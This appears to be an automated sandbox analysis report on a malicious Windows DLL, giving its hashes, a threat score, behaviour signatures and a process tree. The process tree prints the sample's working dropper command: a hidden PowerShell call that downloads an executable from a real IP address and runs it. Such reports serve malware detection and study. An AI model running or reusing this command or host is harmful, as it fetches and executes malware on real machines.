Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    12-05-2024 12:01

General

  • Target

    Sh1t.dll

  • Size

    12.3MB

  • MD5

    8d1e6c16a13ef1b1d8d681d6aa920e67

  • SHA1

    1f061ab5845a9ab887f1f1367016fc9600517e08

  • SHA256

    623afd3e2835f4a6b597f7aeec9301521778e3f82365d745e81de37f800bd1b7

  • SHA512

    b8052b50d8c7b25bacd4831417a83e6e40d351c712071f3cdceb167e498037e88e5b219646090a8f09e0b0246204432d5e28e1b644a640af332acf11d3ae35a6

  • SSDEEP

    196608:Hf8xXyVKVap/Xq/pefvyKEpb6O9DNe23Nn1cRTi+VVYAePVeRgUQWoWzUB+:/f1tqBefvTOhg0GrVY78oR0

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\Sh1t.dll,#1
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -command Invoke-WebRequest -Uri 'http://5.42.80.34/gm2.exe' -OutFile '1.exe'; Start-Process '1.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2392

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2392-18-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2392-19-0x0000000001D10000-0x0000000001D18000-memory.dmp

    Filesize

    32KB

  • memory/2856-0-0x000007FEF3E98000-0x000007FEF45C9000-memory.dmp

    Filesize

    7.2MB

  • memory/2856-10-0x00000000779E0000-0x00000000779E2000-memory.dmp

    Filesize

    8KB

  • memory/2856-11-0x000007FEF3E90000-0x000007FEF5213000-memory.dmp

    Filesize

    19.5MB

  • memory/2856-8-0x00000000779E0000-0x00000000779E2000-memory.dmp

    Filesize

    8KB

  • memory/2856-6-0x00000000779E0000-0x00000000779E2000-memory.dmp

    Filesize

    8KB

  • memory/2856-5-0x00000000779D0000-0x00000000779D2000-memory.dmp

    Filesize

    8KB

  • memory/2856-3-0x00000000779D0000-0x00000000779D2000-memory.dmp

    Filesize

    8KB

  • memory/2856-1-0x00000000779D0000-0x00000000779D2000-memory.dmp

    Filesize

    8KB

  • memory/2856-12-0x000007FEF3E90000-0x000007FEF5213000-memory.dmp

    Filesize

    19.5MB

  • memory/2856-13-0x000007FEF3E90000-0x000007FEF5213000-memory.dmp

    Filesize

    19.5MB